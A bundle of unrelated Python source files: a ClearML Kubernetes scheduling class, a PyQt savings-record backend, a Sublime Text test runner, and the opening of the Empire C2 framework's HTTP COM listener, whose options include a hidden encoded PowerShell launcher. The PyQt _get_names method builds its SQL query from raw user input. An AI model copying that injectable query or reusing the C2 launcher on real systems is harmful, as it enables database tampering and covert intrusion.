r"sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd",
"echo 'AcceptEnv TRAINS_API_ACCESS_KEY TRAINS_API_SECRET_KEY CLEARML_API_ACCESS_KEY CLEARML_API_SECRET_KEY' "
">> /etc/ssh/sshd_config",
'echo "export VISIBLE=now" >> /etc/profile',
'echo "export PATH=$PATH" >> /etc/profile',
'echo "ldconfig" >> /etc/profile',
"/usr/sbin/sshd -p {port}"]
CONTAINER_BASH_SCRIPT = [
"export DEBIAN_FRONTEND='noninteractive'",
"echo 'Binary::apt::APT::Keep-Downloaded-Packages \"true\";' > /etc/apt/apt.conf.d/docker-clean",
"chown -R root /root/.cache/pip",
"apt-get update",
"apt-get install -y git libsm6 libxext6 libxrender-dev libglib2.0-0",
"declare LOCAL_PYTHON",
"for i in {{10..5}}; do which python3.$i && python3.$i -m pip --version && "
"export LOCAL_PYTHON=$(which python3.$i) && break ; done",
"[ ! -z $LOCAL_PYTHON ] || apt-get install -y python3-pip",
"[ ! -z $LOCAL_PYTHON ] || export LOCAL_PYTHON=python3",
"$LOCAL_PYTHON -m pip install clearml-agent",
"{extra_bash_init_cmd}",
"{extra_docker_bash_script}",
"$LOCAL_PYTHON -m clearml_agent execute --full-monitoring --require-queue --id {task_id}"
]
_edit_hyperparams_version = "2.9"
def __init__(
self,
k8s_pending_queue_name=None,
kubectl_cmd=None,
container_bash_script=None,
debug=False,
ports_mode=False,
num_of_services=20,
base_pod_num=1,
user_props_cb=None,
overrides_yaml=None,
template_yaml=None,
clearml_conf_file=None,
extra_bash_init_script=None,
namespace=None,
max_pods_limit=None,
**kwargs
):
"""
Initialize the k8s integration glue layer daemon
:param str k8s_pending_queue_name: queue name to use when task is pending in the k8s scheduler
:param str|callable kubectl_cmd: kubectl command line str, supports formatting (default: KUBECTL_RUN_CMD)
example: "task={task_id} image={docker_image} queue_id={queue_id}"
or a callable function: kubectl_cmd(task_id, docker_image, docker_args, queue_id, task_data)
:param str container_bash_script: container bash script to be executed in k8s (default: CONTAINER_BASH_SCRIPT)
Notice this string is passed through a format() call; literal curly brackets must be doubled ({ -> {{)
Format arguments passed: {task_id} and {extra_bash_init_cmd}
:param bool debug: Switch logging on
:param bool ports_mode: Adds a label to each pod which can be used in services in order to expose ports.
Requires the `num_of_services` parameter.
:param int num_of_services: Number of k8s services configured in the cluster. Required if `ports_mode` is True.
(default: 20)
:param int base_pod_num: Used when `ports_mode` is True, sets the base pod number to a given value (default: 1)
:param callable user_props_cb: An Optional callable allowing additional user properties to be specified
when scheduling a task to run in a pod. Callable can receive an optional pod number and should return
a dictionary of user properties (name and value). Signature is [[Optional[int]], Dict[str,str]]
:param str overrides_yaml: YAML file containing the overrides for the pod (optional)
:param str template_yaml: YAML file containing the template for the pod (optional).
If provided the pod is scheduled with kubectl apply and overrides are ignored, otherwise with kubectl run.
:param str clearml_conf_file: clearml.conf file to be used by the pod itself (optional)
:param str extra_bash_init_script: Additional bash script to run before starting the Task inside the container
:param str namespace: K8S namespace to be used when creating the new pods (default: clearml)
:param int max_pods_limit: Maximum number of pods that K8S glue can run at the same time
"""
super(K8sIntegration, self).__init__()
self.k8s_pending_queue_name = k8s_pending_queue_name or self.K8S_PENDING_QUEUE
self.kubectl_cmd = kubectl_cmd or self.KUBECTL_RUN_CMD
self.container_bash_script = container_bash_script or self.CONTAINER_BASH_SCRIPT
# Always use system packages, because we will be running inside a docker container
self._session.config.put("agent.package_manager.system_site_packages", True)
# Add debug logging
if debug:
self.log.logger.disabled = False
self.log.logger.setLevel(logging.INFO)
self.ports_mode = ports_mode
self.num_of_services = num_of_services
self.base_pod_num = base_pod_num
self._edit_hyperparams_support = None
self._user_props_cb = user_props_cb
self.conf_file_content = None
self.overrides_json_string = None
self.template_dict = None
self.extra_bash_init_script = extra_bash_init_script or None
if self.extra_bash_init_script and not isinstance(self.extra_bash_init_script, str):
self.extra_bash_init_script = ' ; '.join(self.extra_bash_init_script) # noqa
self.namespace = namespace or self.K8S_DEFAULT_NAMESPACE
self.pod_limits = []
self.pod_requests = []
self.max_pods_limit = max_pods_limit if not self.ports_mode else None
if overrides_yaml:
with open(os.path.expandvars(os.path.expanduser(str(overrides_yaml))), 'rt') as f:
overrides = yaml.load(f, Loader=getattr(yaml, 'FullLoader', None))
if overrides:
containers = overrides.get('spec', {}).get('containers', [])
for c in containers:
resources = {str(k).lower(): v for k, v in c.get('resources', {}).items()}
if not resources:
continue
if resources.get('limits'):
self.pod_limits += ['{}={}'.format(k, v) for k, v in resources['limits'].items()]
if resources.get('requests'):
self.pod_requests += ['{}={}'.format(k, v) for k, v in resources['requests'].items()]
                    # remove duplicate entries
self.pod_limits = list(set(self.pod_limits))
self.pod_requests = list(set(self.pod_requests))
if self.pod_limits or self.pod_requests:
self.log.warning('Found pod container requests={} limits={}'.format(
self.pod_limits, self.pod_requests))
if containers:
self.log.warning('Removing containers section: {}'.format(overrides['spec'].pop('containers')))
self.overrides_json_string = json.dumps(overrides)
if template_yaml:
with open(os.path.expandvars(os.path.expanduser(str(template_yaml))), 'rt') as f:
self.template_dict = yaml.load(f, Loader=getattr(yaml, 'FullLoader', None))
clearml_conf_file = clearml_conf_file or kwargs.get('trains_conf_file')
if clearml_conf_file:
with open(os.path.expandvars(os.path.expanduser(str(clearml_conf_file))), 'rt') as f:
self.conf_file_content = f.read()
# make sure we use system packages!
self.conf_file_content += '\nagent.package_manager.system_site_packages=true\n'
self._monitor_hanging_pods()
def _monitor_hanging_pods(self):
_check_pod_thread = Thread(target=self._monitor_hanging_pods_daemon)
_check_pod_thread.daemon = True
_check_pod_thread.start()
def _monitor_hanging_pods_daemon(self):
while True:
output = get_bash_output('kubectl get pods -n {namespace} -o=JSON'.format(
namespace=self.namespace
))
output = '' if not output else output if isinstance(output, str) else output.decode('utf-8')
try:
output_config = json.loads(output)
except Exception as ex:
self.log.warning('K8S Glue pods monitor: Failed parsing kubectl output:\n{}\nEx: {}'.format(output, ex))
sleep(self._polling_interval)
continue
pods = output_config.get('items', [])
for pod in pods:
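                # functools.reduce walks the nested dict path; e.g. (hypothetical pod)
                # reduce(lambda a, b: a[b], ('status', 'phase'), {'status': {'phase': 'Running'}})
                # evaluates to 'Running'. An IndexError/KeyError below means this
                # pod has no waiting reason and is skipped.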
try:
reason = functools.reduce(
lambda a, b: a[b], ('status', 'containerStatuses', 0, 'state', 'waiting', 'reason'), pod
)
except (IndexError, KeyError):
continue
if reason == 'ImagePullBackOff':
pod_name = pod.get('metadata', {}).get('name', None)
if pod_name:
task_id = pod_name.rpartition('-')[-1]
delete_pod_cmd = 'kubectl delete pods {} -n {}'.format(pod_name, self.namespace)
get_bash_output(delete_pod_cmd)
try:
self._session.api_client.tasks.failed(
task=task_id,
status_reason="K8S glue error due to ImagePullBackOff",
status_message="Changed by K8S glue",
force=True
)
except Exception as ex:
self.log.warning(
'K8S Glue pods monitor: Failed deleting task "{}"\nEX: {}'.format(task_id, ex)
)
sleep(self._polling_interval)
def _set_task_user_properties(self, task_id: str, **properties: str):
if self._edit_hyperparams_support is not True:
# either not supported or never tested
if self._edit_hyperparams_support == self._session.api_version:
# tested against latest api_version, not supported
return
if not self._session.check_min_api_version(self._edit_hyperparams_version):
# not supported due to insufficient api_version
self._edit_hyperparams_support = self._session.api_version
return
try:
self._session.get(
service="tasks",
action="edit_hyper_params",
task=task_id,
hyperparams=[
{
"section": "properties",
"name": k,
"value": str(v),
}
for k, v in properties.items()
],
)
# definitely supported
            self._edit_hyperparams_support = True
except APIError as error:
if error.code == 404:
self._edit_hyperparams_support = self._session.api_version
def run_one_task(self, queue: Text, task_id: Text, worker_args=None, **_):
print('Pulling task {} launching on kubernetes cluster'.format(task_id))
task_data = self._session.api_client.tasks.get_all(id=[task_id])[0]
# push task into the k8s queue, so we have visibility on pending tasks in the k8s scheduler
try:
print('Pushing task {} into temporary pending queue'.format(task_id))
self._session.api_client.tasks.reset(task_id)
self._session.api_client.tasks.enqueue(task_id, queue=self.k8s_pending_queue_name,
status_reason='k8s pending scheduler')
except Exception as e:
self.log.error("ERROR: Could not push back task [{}] to k8s pending queue [{}], error: {}".format(
task_id, self.k8s_pending_queue_name, e))
return
container = get_task_container(self._session, task_id)
if not container.get('image'):
container['image'] = str(
ENV_DOCKER_IMAGE.get() or self._session.config.get("agent.default_docker.image", "nvidia/cuda")
)
container['arguments'] = self._session.config.get("agent.default_docker.arguments", None)
# get the clearml.conf encoded file
# noinspection PyProtectedMember
hocon_config_encoded = (
self.conf_file_content
or Path(self._session._config_file).read_text()
).encode("ascii")
create_clearml_conf = "echo '{}' | base64 --decode >> ~/clearml.conf".format(
base64.b64encode(
hocon_config_encoded
).decode('ascii')
)
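        # The configuration is shipped base64-encoded and decoded inside the pod,
        # which sidesteps shell quoting/escaping issues; the generated command is
        # roughly: echo '<b64>' | base64 --decode >> ~/clearml.conf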
if self.ports_mode:
print("Kubernetes looking for available pod to use")
# noinspection PyBroadException
try:
queue_name = self._session.api_client.queues.get_by_id(queue=queue).name
except Exception:
queue_name = 'k8s'
# Search for a free pod number
pod_count = 0
pod_number = self.base_pod_num
while self.ports_mode or self.max_pods_limit:
pod_number = self.base_pod_num + pod_count
if self.ports_mode:
kubectl_cmd_new = "kubectl get pods -l {pod_label},{agent_label} -n {namespace}".format(
pod_label=self.LIMIT_POD_LABEL.format(pod_number=pod_number),
agent_label=self.AGENT_LABEL,
namespace=self.namespace,
)
else:
kubectl_cmd_new = "kubectl get pods -l {agent_label} -n {namespace} -o json".format(
agent_label=self.AGENT_LABEL,
namespace=self.namespace,
)
process = subprocess.Popen(kubectl_cmd_new.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
output = '' if not output else output if isinstance(output, str) else output.decode('utf-8')
error = '' if not error else error if isinstance(error, str) else error.decode('utf-8')
if not output:
                # No such pod exists, so we can use the pod_number we found
break
if self.max_pods_limit:
try:
current_pod_count = len(json.loads(output).get("items", []))
except (ValueError, TypeError) as ex:
self.log.warning(
"K8S Glue pods monitor: Failed parsing kubectl output:\n{}\ntask '{}' "
"will be enqueued back to queue '{}'\nEx: {}".format(
output, task_id, queue, ex
)
)
self._session.api_client.tasks.reset(task_id)
self._session.api_client.tasks.enqueue(task_id, queue=queue, status_reason='kubectl parsing error')
return
max_count = self.max_pods_limit
else:
current_pod_count = pod_count
max_count = self.num_of_services - 1
if current_pod_count >= max_count:
# All pods are taken, exit
self.log.debug(
"kubectl last result: {}\n{}".format(error, output))
self.log.warning(
"All k8s services are in use, task '{}' "
"will be enqueued back to queue '{}'".format(
task_id, queue
)
)
self._session.api_client.tasks.reset(task_id)
self._session.api_client.tasks.enqueue(
task_id, queue=queue, status_reason='k8s max pod limit (no free k8s service)')
return
elif self.max_pods_limit:
                # max pods limit hasn't been reached yet, so we can create the pod
break
pod_count += 1
labels = ([self.LIMIT_POD_LABEL.format(pod_number=pod_number)] if self.ports_mode else []) + [self.AGENT_LABEL]
labels.append("clearml-agent-queue={}".format(self._safe_k8s_label_value(queue)))
labels.append("clearml-agent-queue-name={}".format(self._safe_k8s_label_value(queue_name)))
if self.ports_mode:
print("Kubernetes scheduling task id={} on pod={} (pod_count={})".format(task_id, pod_number, pod_count))
else:
print("Kubernetes scheduling task id={}".format(task_id))
kubectl_kwargs = dict(
create_clearml_conf=create_clearml_conf,
labels=labels,
docker_image=container['image'],
docker_args=container['arguments'],
docker_bash=container.get('setup_shell_script'),
task_id=task_id,
queue=queue
)
if self.template_dict:
output, error = self._kubectl_apply(**kubectl_kwargs)
else:
output, error = self._kubectl_run(task_data=task_data, **kubectl_kwargs)
error = '' if not error else (error if isinstance(error, str) else error.decode('utf-8'))
output = '' if not output else (output if isinstance(output, str) else output.decode('utf-8'))
print('kubectl output:\n{}\n{}'.format(error, output))
if error:
send_log = "Running kubectl encountered an error: {}".format(error)
self.log.error(send_log)
self.send_logs(task_id, send_log.splitlines())
user_props = {"k8s-queue": str(queue_name)}
if self.ports_mode:
user_props.update(
{
"k8s-pod-number": pod_number,
"k8s-pod-label": labels[0],
"k8s-internal-pod-count": pod_count,
}
)
if self._user_props_cb:
# noinspection PyBroadException
try:
custom_props = self._user_props_cb(pod_number) if self.ports_mode else self._user_props_cb()
user_props.update(custom_props)
except Exception:
pass
if user_props:
self._set_task_user_properties(
task_id=task_id,
**user_props
)
def _get_docker_args(self, docker_args, flags, target=None, convert=None):
# type: (List[str], Collection[str], Optional[str], Callable[[str], Any]) -> Union[dict, List[str]]
"""
Get docker args matching specific flags.
:argument docker_args: List of docker argument strings (flags and values)
:argument flags: List of flags/names to intercept (e.g. "--env" etc.)
:argument target: Controls return format. If provided, returns a dict with a target field containing a list
of result strings, otherwise returns a list of result strings
:argument convert: Optional conversion function for each result string
"""
args = docker_args[:] if docker_args else []
results = []
while args:
cmd = args.pop(0).strip()
if cmd in flags:
env = args.pop(0).strip()
if convert:
env = convert(env)
results.append(env)
else:
self.log.warning('skipping docker argument {} (only -e --env supported)'.format(cmd))
if target:
return {target: results} if results else {}
return results
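    # Example (hypothetical arguments):
    #   _get_docker_args(["--env", "A=1", "-e", "B=2", "--privileged"], flags={"-e", "--env"})
    #   -> ["A=1", "B=2"]   ("--privileged" is skipped with a warning)
    #   With target="env" the same call returns {"env": ["A=1", "B=2"]}.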
def _kubectl_apply(self, create_clearml_conf, docker_image, docker_args, docker_bash, labels, queue, task_id):
template = deepcopy(self.template_dict)
template.setdefault('apiVersion', 'v1')
template['kind'] = 'Pod'
template.setdefault('metadata', {})
name = 'clearml-id-{task_id}'.format(task_id=task_id)
template['metadata']['name'] = name
template.setdefault('spec', {})
template['spec'].setdefault('containers', [])
template['spec'].setdefault('restartPolicy', 'Never')
if labels:
labels_dict = dict(pair.split('=', 1) for pair in labels)
template['metadata'].setdefault('labels', {})
template['metadata']['labels'].update(labels_dict)
container = self._get_docker_args(
docker_args,
target="env",
flags={"-e", "--env"},
convert=lambda env: {'name': env.partition("=")[0], 'value': env.partition("=")[2]},
)
container_bash_script = [self.container_bash_script] if isinstance(self.container_bash_script, str) \
else self.container_bash_script
extra_docker_bash_script = '\n'.join(self._session.config.get("agent.extra_docker_shell_script", None) or [])
if docker_bash:
extra_docker_bash_script += '\n' + str(docker_bash) + '\n'
script_encoded = '\n'.join(
['#!/bin/bash', ] +
[line.format(extra_bash_init_cmd=self.extra_bash_init_script or '',
task_id=task_id,
extra_docker_bash_script=extra_docker_bash_script)
for line in container_bash_script])
create_init_script = \
"echo '{}' | base64 --decode >> ~/__start_agent__.sh ; " \
"/bin/bash ~/__start_agent__.sh".format(
base64.b64encode(
script_encoded.encode('ascii')
).decode('ascii'))
# Notice: we always leave with exit code 0, so pods are never restarted
container = self._merge_containers(
container,
dict(name=name, image=docker_image,
command=['/bin/bash'],
args=['-c', '{} ; {} ; exit 0'.format(create_clearml_conf, create_init_script)])
)
if template['spec']['containers']:
template['spec']['containers'][0] = self._merge_containers(template['spec']['containers'][0], container)
else:
template['spec']['containers'].append(container)
if self._docker_force_pull:
for c in template['spec']['containers']:
c.setdefault('imagePullPolicy', 'Always')
fp, yaml_file = tempfile.mkstemp(prefix='clearml_k8stmpl_', suffix='.yml')
os.close(fp)
with open(yaml_file, 'wt') as f:
yaml.dump(template, f)
kubectl_cmd = self.KUBECTL_APPLY_CMD.format(
task_id=task_id,
docker_image=docker_image,
queue_id=queue,
namespace=self.namespace
)
# make sure we provide a list
if isinstance(kubectl_cmd, str):
kubectl_cmd = kubectl_cmd.split()
# add the template file at the end
kubectl_cmd += [yaml_file]
try:
process = subprocess.Popen(kubectl_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
except Exception as ex:
return None, str(ex)
finally:
safe_remove_file(yaml_file)
return output, error
def _kubectl_run(
self, create_clearml_conf, docker_image, docker_args, docker_bash, labels, queue, task_data, task_id
):
if callable(self.kubectl_cmd):
kubectl_cmd = self.kubectl_cmd(task_id, docker_image, docker_args, queue, task_data)
else:
kubectl_cmd = self.kubectl_cmd.format(
task_id=task_id,
docker_image=docker_image,
docker_args=" ".join(self._get_docker_args(
docker_args, flags={"-e", "--env"}, convert=lambda env: '--env={}'.format(env))
),
queue_id=queue,
namespace=self.namespace,
)
# make sure we provide a list
if isinstance(kubectl_cmd, str):
kubectl_cmd = kubectl_cmd.split()
if self.overrides_json_string:
kubectl_cmd += ['--overrides=' + self.overrides_json_string]
if self.pod_limits:
kubectl_cmd += ['--limits', ",".join(self.pod_limits)]
if self.pod_requests:
kubectl_cmd += ['--requests', ",".join(self.pod_requests)]
if self._docker_force_pull and not any(x.startswith("--image-pull-policy=") for x in kubectl_cmd):
kubectl_cmd += ["--image-pull-policy='always'"]
container_bash_script = [self.container_bash_script] if isinstance(self.container_bash_script, str) \
else self.container_bash_script
container_bash_script = ' ; '.join(container_bash_script)
kubectl_cmd += [
"--labels=" + ",".join(labels),
"--command",
"--",
"/bin/sh",
"-c",
"{} ; {}".format(create_clearml_conf, container_bash_script.format(
extra_bash_init_cmd=self.extra_bash_init_script or "",
extra_docker_bash_script=docker_bash or "",
task_id=task_id
)),
]
process = subprocess.Popen(kubectl_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
return output, error
def run_tasks_loop(self, queues: List[Text], worker_params, **kwargs):
"""
:summary: Pull and run tasks from queues.
:description: 1. Go through ``queues`` by order.
2. Try getting the next task for each and run the first one that returns.
3. Go to step 1
:param queues: IDs of queues to pull tasks from
:type queues: list of ``Text``
:param worker_params: Worker command line arguments
:type worker_params: ``clearml_agent.helper.process.WorkerParams``
"""
events_service = self.get_service(Events)
# make sure we have a k8s pending queue
# noinspection PyBroadException
try:
self._session.api_client.queues.create(self.k8s_pending_queue_name)
except Exception:
pass
# get queue id
self.k8s_pending_queue_name = self._resolve_name(self.k8s_pending_queue_name, "queues")
_last_machine_update_ts = 0
while True:
# iterate over queues (priority style, queues[0] is highest)
for queue in queues:
# delete old completed / failed pods
get_bash_output(self.KUBECTL_DELETE_CMD.format(namespace=self.namespace, selector=self.AGENT_LABEL))
# get next task in queue
try:
response = self._session.api_client.queues.get_next_task(queue=queue)
except Exception as e:
print("Warning: Could not access task queue [{}], error: {}".format(queue, e))
continue
else:
try:
task_id = response.entry.task
except AttributeError:
print("No tasks in queue {}".format(queue))
continue
events_service.send_log_events(
self.worker_id,
task_id=task_id,
lines="task {} pulled from {} by worker {}".format(
task_id, queue, self.worker_id
),
level="INFO",
)
self.report_monitor(ResourceMonitor.StatusReport(queues=queues, queue=queue, task=task_id))
self.run_one_task(queue, task_id, worker_params)
self.report_monitor(ResourceMonitor.StatusReport(queues=self.queues))
break
else:
# sleep and retry polling
print("No tasks in Queues, sleeping for {:.1f} seconds".format(self._polling_interval))
sleep(self._polling_interval)
if self._session.config["agent.reload_config"]:
self.reload_config()
def k8s_daemon(self, queue):
"""
Start the k8s Glue service.
This service will be pulling tasks from *queue* and scheduling them for execution using kubectl.
Notice all scheduled tasks are pushed back into K8S_PENDING_QUEUE,
and popped when execution actually starts. This creates full visibility into the k8s scheduler.
        Manually popping a task from the K8S_PENDING_QUEUE will cause the k8s glue
        to skip that task's execution once its pod is actually scheduled to run.
        :param str queue: queue name to pull from
"""
return self.daemon(queues=[ObjectID(name=queue)] if queue else None,
log_level=logging.INFO, foreground=True, docker=False)
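    # Usage sketch (hypothetical queue name): K8sIntegration().k8s_daemon("default")
    # blocks forever, pulling tasks from the "default" queue and scheduling a pod
    # per task via kubectl.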
@classmethod
def get_ssh_server_bash(cls, ssh_port_number):
return ' ; '.join(line.format(port=ssh_port_number) for line in cls.BASH_INSTALL_SSH_CMD)
@staticmethod
def _merge_containers(c1, c2):
def merge_env(k, d1, d2, not_set):
if k != "env":
return not_set
# Merge environment lists, second list overrides first
return list({
item['name']: item for envs in (d1, d2) for item in envs
}.values())
return merge_dicts(
c1, c2, custom_merge_func=merge_env
)
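    # Example (hypothetical containers): env lists are merged by name, with c2
    # overriding c1:
    #   c1 = {"env": [{"name": "A", "value": "1"}, {"name": "B", "value": "2"}]}
    #   c2 = {"env": [{"name": "B", "value": "3"}]}
    #   -> merged "env": [{"name": "A", "value": "1"}, {"name": "B", "value": "3"}]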
@staticmethod
def _safe_k8s_label_value(value):
""" Conform string to k8s standards for a label value """
value = value.lower().strip()
value = re.sub(r'^[^A-Za-z0-9]+', '', value) # strip leading non-alphanumeric chars
value = re.sub(r'[^A-Za-z0-9]+$', '', value) # strip trailing non-alphanumeric chars
value = re.sub(r'\W+', '-', value) # allow only word chars (this removed "." which is supported, but nvm)
value = re.sub(r'-+', '-', value) # don't leave messy "--" after replacing previous chars
return value[:63]
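    # Example (hypothetical value): _safe_k8s_label_value("Queue/Name: GPU.1")
    # -> "queue-name-gpu-1" (lowercased, non-word runs collapsed to "-",
    # leading/trailing symbols stripped, capped at the 63-char k8s limit)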
|
func.py
|
import os
import threading
import sqlite3
from datetime import datetime
from PyQt5.QtCore import QObject, pyqtSlot, pyqtSignal
class Backend(QObject):
def __init__(self):
super().__init__()
self.officer = ''
returnNames = pyqtSignal(list, arguments=['returnRes'])
returnOfficerCollections = pyqtSignal(list, arguments=['returnedCollections'])
savingRecord = pyqtSignal(str, arguments=['saveRec'])
savedRecord = pyqtSignal(list, arguments=['savedRec'])
savingError = pyqtSignal(str, arguments=['savingError'])
    def num_exists(self, num):
        conn = sqlite3.connect('clients.db')
        cursor = conn.cursor()
        # parameterized query avoids SQL injection
        sql = "SELECT no FROM clients WHERE no = ?"
        cursor.execute(sql, (num,))
        db = cursor.fetchall()
        conn.close()
        return bool(db)
def add_record(self, name, num):
"""
        Add record for client if client doesn't exist
"""
name = name.title()
conn = sqlite3.connect('clients.db')
cursor = conn.cursor()
sql = "INSERT INTO clients VALUES (?, ?, ?)"
cursor.execute(sql, (num, name, 0))
conn.commit()
conn.close()
@pyqtSlot(str)
def get_names(self, patt):
g_thread = threading.Thread(target=self._get_names, args=[patt])
g_thread.daemon = True
g_thread.start()
def _get_names(self, patt):
conn = sqlite3.connect('clients.db')
cursor = conn.cursor()
cond = f"'%{patt}%'"
sql = "SELECT no, name FROM clients WHERE name LIKE " + cond
cursor.execute(sql)
db = cursor.fetchall()
conn.commit()
conn.close()
names = []
for item in db:
obj = {}
obj['num'] = item[0]
obj['name'] = item[1]
names.append(obj)
self.returnRes(names)
@pyqtSlot(str)
def get_officer_collections(self, officer: str = ''):
g_thread = threading.Thread(target=self._get_officer_collections, args=[officer])
g_thread.daemon = True
g_thread.start()
def _get_officer_collections(self, officer: str = ''):
"""
        Get collections for the officer (note: the officer argument is accepted
        for the slot signature but not yet used to filter; all records are
        returned, newest first)
"""
db_name = f"daily-contrib.db"
if not os.path.exists(db_name):
return
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
sql = "SELECT acc_no, acc_name, deposit, installation, withdrawal, officer, `date` FROM daily_contributions ORDER BY `date` DESC"
cursor.execute(sql)
db = cursor.fetchall()
        conn.close()
names = []
for item in db:
obj = {}
obj['account_no'] = str(item[0])
obj['fullname'] = item[1]
obj['deposit'] = int(item[2])
obj['installments'] = int(item[3])
obj['withdrawal'] = int(item[4])
obj['officer'] = item[5]
obj['payment_date'] = item[6].split('T')[0]
names.append(obj)
self.returnOfficerCollections.emit(names)
def returnRes(self, names):
self.returnNames.emit(names)
def save_contrib(self, officer, num, name, deposit, installments, withdrawal):
"""
Save daily contrib information to the database
"""
# emit signal
self.savingRecord.emit('')
name = name.title()
officer = officer.lower()
date_str = datetime.utcnow().isoformat()
        officer = self.officer or officer  # prefer the officer set on the backend, if any
db_name = f"daily-contrib.db"
if not os.path.exists(db_name):
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
tables = "uid INTEGER AUTO_INCREMENT PRIMARY KEY, acc_no Number, acc_name text, "
tables += "deposit Number, installation Number, "
tables += "withdrawal Number, officer text, "
tables += "date TIMESTAMP DEFAULT CURRENT_TIMESTAMP, "
tables += "update_date TIMESTAMP CURRENT_TIMESTAMP"
sql = f"CREATE TABLE daily_contributions ({tables})"
cursor.execute(sql)
conn.commit()
conn.close()
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
sql = "INSERT INTO daily_contributions (acc_no, acc_name, deposit, installation, withdrawal, officer, `date`) VALUES (?, ?, ?, ?, ?, ?, ?)"
cursor.execute(sql, (num, name, deposit, installments, withdrawal, officer, date_str))
conn.commit()
record = []
obj = {}
obj['account_no'] = str(num)
obj['fullname'] = name
obj['deposit'] = deposit
obj['installments'] = installments
obj['withdrawal'] = withdrawal
obj['officer'] = officer
obj['payment_date'] = date_str.split('T')[0]
record.append(obj)
self.savedRecord.emit(record)
conn.close()
@pyqtSlot(int, str, float, float, float)
def save_and_exit(self, *args):
se_thread = threading.Thread(target=self._save_and_exit, args=[*args])
se_thread.daemon = True
se_thread.start()
def _save_and_exit(self, num, name, deposit, installments, withdrawal, date='', officer='maxwell'):
print(num, name)
if not self.num_exists(num):
self.add_record(name, num)
self.save_contrib(officer, num, name, deposit, installments, withdrawal)
@pyqtSlot(str, str, str, str, str)
def save_and_add(self, *args):
se_thread = threading.Thread(target=self._save_and_add, args=[*args])
se_thread.daemon = True
se_thread.start()
def _save_and_add(self, num, name, deposit, installments, withdrawal, date='', officer='maxwell'):
print(num, name)
if not self.num_exists(num):
self.add_record(name, num)
self.save_contrib(officer, num, name, deposit, installments, withdrawal)
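# Minimal usage sketch (hypothetical wiring; normally connected from QML):
#   backend = Backend()
#   backend.returnNames.connect(print)   # receives the list emitted by get_names
#   backend.get_names("jo")              # async lookup against clients.db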
|
test_package.py
|
import sublime
import sublime_plugin
import sys
import os
import logging
from unittest import TextTestRunner, TestSuite
from .core import TestLoader, DeferringTextTestRunner, DeferrableTestCase
from .mixin import UnitTestingMixin
from .const import DONE_MESSAGE
from .utils import ProgressBar, StdioSplitter
import threading
class UnitTestingCommand(sublime_plugin.ApplicationCommand, UnitTestingMixin):
def run(self, package=None, **kargs):
if not package:
self.prompt_package(lambda x: self.run(x, **kargs))
return
package, pattern = self.input_parser(package)
settings = self.load_unittesting_settings(package, pattern=pattern, **kargs)
stream = self.load_stream(package, settings)
if settings["async"]:
threading.Thread(target=lambda: self.unit_testing(stream, package, settings)).start()
else:
self.unit_testing(stream, package, settings)
def verify_testsuite(self, tests):
for t in tests:
if isinstance(t, TestSuite):
self.verify_testsuite(t)
if isinstance(t, DeferrableTestCase):
raise Exception("DeferrableTestCase is used but `deferred` is `false`.")
    def unit_testing(self, stream, package, settings, cleanup_hooks=None):
        # avoid the shared mutable default argument pitfall
        cleanup_hooks = cleanup_hooks or []
        if settings["capture_console"]:
stdout = sys.stdout
stderr = sys.stderr
handler = logging.StreamHandler(stream)
logging.root.addHandler(handler)
sys.stdout = StdioSplitter(stdout, stream)
sys.stderr = StdioSplitter(stderr, stream)
testRunner = None
progress_bar = ProgressBar("Testing %s" % package)
progress_bar.start()
try:
# use custom loader which supports reloading modules
self.remove_test_modules(package, settings["tests_dir"])
loader = TestLoader(settings["deferred"])
tests = loader.discover(os.path.join(
sublime.packages_path(), package, settings["tests_dir"]), settings["pattern"]
)
# use deferred test runner or default test runner
if settings["deferred"]:
testRunner = DeferringTextTestRunner(stream, verbosity=settings["verbosity"])
else:
self.verify_testsuite(tests)
testRunner = TextTestRunner(stream, verbosity=settings["verbosity"])
testRunner.run(tests)
except Exception as e:
if not stream.closed:
stream.write("ERROR: %s\n" % e)
# force clean up
testRunner = None
finally:
def cleanup(status=0):
if not settings["deferred"] or not testRunner or \
testRunner.finished or status > 600:
self.remove_test_modules(package, settings["tests_dir"])
progress_bar.stop()
for hook in cleanup_hooks:
hook()
if not hasattr(stream, 'window'):
                    # Only print the done message when not writing to an output
                    # panel; it is only required for CI test runs.
stream.write("\n")
stream.write(DONE_MESSAGE)
stream.close()
if settings["capture_console"]:
sys.stdout = stdout
sys.stderr = stderr
# remove stream set by logging.root.addHandler
logging.root.removeHandler(handler)
else:
sublime.set_timeout(lambda: cleanup(status + 1), 500)
cleanup()
|
http_com.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import sys
import time
from builtins import object
from builtins import str
from typing import List
from flask import Flask, request, make_response, send_from_directory
from pydispatch import dispatcher
from werkzeug.serving import WSGIRequestHandler
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import packets
from empire.server.utils import data_util
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
